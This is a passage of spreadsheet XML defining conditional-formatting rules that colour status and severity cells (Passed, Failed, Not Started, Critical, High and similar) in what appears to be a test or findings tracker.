      <formula>NOT(ISERROR(SEARCH("Passed",E91)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E91">
    <cfRule type="containsText" dxfId="297" priority="350" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E91)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="296" priority="351" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E91)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D92">
    <cfRule type="containsText" dxfId="295" priority="278" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D92)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="294" priority="279" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D92)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E92">
    <cfRule type="containsText" dxfId="293" priority="317" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E92)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="292" priority="318" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E92)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="291" priority="319" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E92)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="290" priority="320" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E92)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="289" priority="321" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E92)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="288" priority="322" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E92)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="287" priority="323" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E92)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="286" priority="326" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E92)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="285" priority="327" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E92)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E92">
    <cfRule type="containsText" dxfId="284" priority="324" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E92)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="283" priority="325" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E92)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D91">
    <cfRule type="containsText" dxfId="282" priority="282" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D91)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="281" priority="283" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D91)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E93">
    <cfRule type="containsText" dxfId="280" priority="302" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E93)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="279" priority="303" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E93)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="278" priority="304" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E93)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="277" priority="305" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E93)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="276" priority="306" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E93)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="275" priority="307" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E93)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="274" priority="308" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E93)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="273" priority="311" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E93)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="272" priority="312" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E93)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E93">
    <cfRule type="containsText" dxfId="271" priority="309" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E93)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="270" priority="310" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E93)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D87">
    <cfRule type="containsText" dxfId="269" priority="300" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D87)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="268" priority="301" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D87)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D87">
    <cfRule type="containsText" dxfId="267" priority="298" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D87)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="266" priority="299" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D87)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D88">
    <cfRule type="containsText" dxfId="265" priority="296" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D88)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="264" priority="297" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D88)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D88">
    <cfRule type="containsText" dxfId="263" priority="294" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D88)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="262" priority="295" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D88)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D89">
    <cfRule type="containsText" dxfId="261" priority="292" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D89)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="260" priority="293" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D89)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D89">
    <cfRule type="containsText" dxfId="259" priority="290" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D89)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="258" priority="291" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D89)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D90">
    <cfRule type="containsText" dxfId="257" priority="288" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D90)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="256" priority="289" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D90)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D90">
    <cfRule type="containsText" dxfId="255" priority="286" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D90)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="254" priority="287" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D90)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D91">
    <cfRule type="containsText" dxfId="253" priority="284" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D91)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="252" priority="285" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D91)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D92">
    <cfRule type="containsText" dxfId="251" priority="280" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D92)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="250" priority="281" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D92)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D93">
    <cfRule type="containsText" dxfId="249" priority="276" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D93)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="248" priority="277" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D93)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D93">
    <cfRule type="containsText" dxfId="247" priority="274" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D93)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="246" priority="275" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D93)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D96">
    <cfRule type="containsText" dxfId="245" priority="268" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D96)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="244" priority="269" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D96)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D96">
    <cfRule type="containsText" dxfId="243" priority="266" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D96)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="242" priority="267" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D96)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D97">
    <cfRule type="containsText" dxfId="241" priority="264" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D97)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="240" priority="265" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D97)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D97">
    <cfRule type="containsText" dxfId="239" priority="262" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D97)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="238" priority="263" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D97)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E82">
    <cfRule type="containsText" dxfId="237" priority="254" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E82)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="236" priority="255" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E82)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E82">
    <cfRule type="containsText" dxfId="235" priority="247" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E82)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="234" priority="248" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E82)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="233" priority="249" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E82)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="232" priority="250" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E82)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="231" priority="251" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E82)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="230" priority="252" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E82)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="229" priority="253" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E82)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="228" priority="256" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E82)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="227" priority="257" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E82)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D62">
    <cfRule type="containsText" dxfId="226" priority="228" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D62)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="225" priority="229" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D62)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E83">
    <cfRule type="containsText" dxfId="224" priority="232" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E83)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="223" priority="233" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E83)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="222" priority="234" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E83)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="221" priority="235" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E83)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="220" priority="236" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E83)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="219" priority="237" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E83)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="218" priority="238" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E83)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="217" priority="241" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E83)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="216" priority="242" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E83)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E83">
    <cfRule type="containsText" dxfId="215" priority="239" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E83)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="214" priority="240" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E83)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D62">
    <cfRule type="containsText" dxfId="213" priority="230" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D62)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="212" priority="231" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D62)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D76">
    <cfRule type="containsText" dxfId="211" priority="226" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D76)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="210" priority="227" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D76)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D76">
    <cfRule type="containsText" dxfId="209" priority="224" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D76)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="208" priority="225" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D76)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D77">
    <cfRule type="containsText" dxfId="207" priority="222" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D77)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="206" priority="223" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D77)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D77">
    <cfRule type="containsText" dxfId="205" priority="220" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D77)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="204" priority="221" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D77)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D78">
    <cfRule type="containsText" dxfId="203" priority="218" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D78)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="202" priority="219" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D78)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D78">
    <cfRule type="containsText" dxfId="201" priority="216" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D78)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="200" priority="217" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D78)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D79">
    <cfRule type="containsText" dxfId="199" priority="214" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D79)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="198" priority="215" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D79)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D79">
    <cfRule type="containsText" dxfId="197" priority="212" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D79)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="196" priority="213" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D79)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D80">
    <cfRule type="containsText" dxfId="195" priority="210" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D80)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="194" priority="211" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D80)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D80">
    <cfRule type="containsText" dxfId="193" priority="208" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D80)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="192" priority="209" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D80)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D81">
    <cfRule type="containsText" dxfId="191" priority="206" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D81)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="190" priority="207" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D81)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D81">
    <cfRule type="containsText" dxfId="189" priority="204" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D81)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="188" priority="205" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D81)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D83">
    <cfRule type="containsText" dxfId="187" priority="202" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D83)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="186" priority="203" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D83)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D83">
    <cfRule type="containsText" dxfId="185" priority="200" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D83)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="184" priority="201" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D83)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D82">
    <cfRule type="containsText" dxfId="183" priority="198" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D82)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="182" priority="199" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D82)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D82">
    <cfRule type="containsText" dxfId="181" priority="196" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D82)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="180" priority="197" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D82)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D132">
    <cfRule type="containsText" dxfId="179" priority="194" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D132)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="178" priority="195" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D132)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D132">
    <cfRule type="containsText" dxfId="177" priority="192" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D132)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="176" priority="193" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D132)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E132">
    <cfRule type="containsText" dxfId="175" priority="181" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E132)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="174" priority="182" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E132)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="173" priority="183" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E132)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="172" priority="184" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E132)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="171" priority="185" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E132)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="170" priority="186" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E132)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="169" priority="187" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E132)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="168" priority="190" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E132)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="167" priority="191" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E132)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E132">
    <cfRule type="containsText" dxfId="166" priority="188" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E132)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="165" priority="189" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E132)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D121">
    <cfRule type="containsText" dxfId="164" priority="179" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D121)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="163" priority="180" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D121)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D121">
    <cfRule type="containsText" dxfId="162" priority="177" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D121)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="161" priority="178" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D121)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E121">
    <cfRule type="containsText" dxfId="160" priority="166" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E121)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="159" priority="167" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E121)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="158" priority="168" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E121)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="157" priority="169" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E121)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="156" priority="170" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E121)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="155" priority="171" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E121)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="154" priority="172" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E121)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="153" priority="175" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E121)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="152" priority="176" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E121)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E121">
    <cfRule type="containsText" dxfId="151" priority="173" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E121)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="150" priority="174" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E121)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E84">
    <cfRule type="containsText" dxfId="149" priority="155" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E84)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="148" priority="156" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E84)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="147" priority="157" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E84)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="146" priority="158" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E84)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="145" priority="159" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E84)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="144" priority="160" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E84)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="143" priority="161" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E84)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="142" priority="164" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E84)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="141" priority="165" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E84)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E84">
    <cfRule type="containsText" dxfId="140" priority="162" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E84)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="139" priority="163" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E84)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D84">
    <cfRule type="containsText" dxfId="138" priority="153" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D84)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="137" priority="154" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D84)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D84">
    <cfRule type="containsText" dxfId="136" priority="151" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D84)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="135" priority="152" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D84)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D136">
    <cfRule type="containsText" dxfId="134" priority="149" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D136)))</formula>
    </cfRule>
